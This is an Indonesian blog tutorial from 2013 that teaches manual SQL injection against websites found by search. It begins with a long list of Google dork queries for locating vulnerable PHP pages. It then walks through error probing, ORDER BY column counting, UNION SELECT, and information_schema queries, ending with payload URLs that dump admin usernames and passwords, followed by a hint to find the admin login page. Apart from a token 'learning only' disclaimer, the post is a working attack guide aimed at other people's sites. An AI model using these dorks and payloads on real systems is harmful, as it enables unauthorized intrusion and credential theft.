Senin, 28 Januari 2013
sumber :
silahkan gunain dork di bawah ini di google, yahoo.etc
Dork:
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=dah dapat kan web target masing masing, kalo udah yuk kita cari database nya
yuk ikuti sedikit langkah langkah jelek ane ini,
note : ini hanya untuk pembelajaran resiko di tanggung masing masing
oke, kita mulai
kita mendapat satu target, nah sekarang target kita itu masukan sqli nya kedalam, dengan cara menambahkan tanda kutip di akhir nya:
neh contoh nya :
http://www.target.com/index.php?id=20 (awal ketemu target, ente kenalan lansung aja, apa ada celah gg ma dia kalo ada celah lansung tembak aja, jadian dan selamat anda pacaran sama dia, selesai......)
dah itu aja... wkwkkwkwkwk
yuk kembali ke topik
tadi kan target dah dapat yuk kita injection dia http://www.target.com/index.php?id=20' (beri tanda kutip di akhr nya yah) kelihatan kan, lalu enter
kalo dah di akse, maka hasil nya harus dapat error kyak gini..
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''20''' at line 1
kalo gg ada di page nya coba lihat di sourcenya dan check ada error gg di source nya kalo ada, yuk ke tahap selanjutnya, kalo gg ada yah, kamu harus cari lagi, target lagi... wkkwkwkwkwk (berjuang brooo tetap semangat ya)
oke selanjutnya, kalo dah ada error nya sekarang kita cari berapa banyak table yang ada di dalam nya
http://www.target.com/index.php?id=20 order by 1-- (itu stripnya 2 kali yah order by 1 strip strip)
(harus dapat juga error nya) kalo gg dapat lanjukan no nya
kayak gini
http://www.target.com/index.php?id=-20 order by 2--
http://www.target.com/index.php?id=-20 order by 3--
http://www.target.com/index.php?id=-20 order by 4--
http://www.target.com/index.php?id=-20 order by 5--
kayak gini error nya Errore nella query: Unknown column '5' in 'order clause'
tiap-tiap target error nya beda beda, nah kalo gitu berarti table nya ada 4, karna erorrnya di 5, tp check dulu mungkin di 4 juga ada error, anda pasti bisa
oke next ya,
sekarang kita sudah tau berapa tabelnya, dan sekarang kita dapatkan angka ajaibnya, agar bisa kita mengetahui sql berapa yang di gunakan, yaitu menggunakan "union select"
ni contoh nya bro
http://www.target.com/index.php?id=-20 union select 1,2,3,4-- (tergantung berapa jumlah table kamu bro)
okeh ntar kamu dapat angka togel nya wkwkkwkwkwkwk, angka paling besar yah bro...
mungkin juga angka itu di Bold, ntar pasti ada beda nya bro
kalo udah sekarang kita cari versi sqlnya, misal nya angka togel itu di angka 2,
http://www.target.com/index.php?id=-20 union select 1,@@version,3,4
nah itu pas di angka dua di ganti sama [@@version]
hasilnya bakal keluar 5.07.77 berarti itu versi nya versi 5, mungkin ada juga bakal nemuin versi 4, tp untuk versi 4 agak rumit diki, kali ini saya mungkin cuma bahas yang versi 5
oke selanjutnya kita cari nama table nya, pake perintah ini union select, atau union all select, okey
http://www.target.com/index.php?id=-20 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
nah ntar keluar nama nama table mungkin kayak gini, atau gimana itu hasil dari hunt kalian
admin,contact,banner,user
nah dari sana silahkan gunakan felling untuk mencari apa nama table nya
okeh kita sekarang cari nama coloumn
untuk mencari nama colomn kita harus conver dulu nama table nya ke hexadecimal
kamu bisa conver string to heck di sini >>converter
kalo sudah saat nya kita cari coloumn
sama seperti di atas tp ada yang berbeda
ini perbedaannya
http://www.target.com/index.php?id=-20 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
http://www.target.com/index.php?id=-20 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0xhexadecimal()
lihatkan beda nya... kalo tidak yuk lebih detail lagi,,,
group_concat(table_name) diganti dengan group_concat(column_name)
information_schema.tables diganti dengan information_schema.columns
table_schema diganti dengan table_name
database di ganti dengan hasil conver tdi
*//pahami sendiri yah pemakaian nya...
oke dah bisa kan...
nah ntar hasil nya kayak gini lah
id,user_name password
kalo udah dapat sekrang kita lihat apa isi dari id, user_name sama password
http://www.target.com/index.php?id=-20 union all select 1,group_concat(id,0x3a,user_name,0x3a.password),3,4 from nama_table
saya jelasasin dikit apa fungsi dari 0x3a, 0x3a a berfungsi sebagai pemberi jarak antara id, user_name, password,
contoh nya
http://www.target.com/index.php?id=-20 union all select 1,group_concat(id,0x3a,user_name,0x3a.password),3,4 from admin--
nah mucul tuh isi nya....
Sekarang Tinggal cari admin page
SELAMAT HUNTING YAH BROTHER, INGAT JANGAN SALAH GUNAKAN ILMU ANDA, KEEP HAPPY TO SHARE,
sumber :
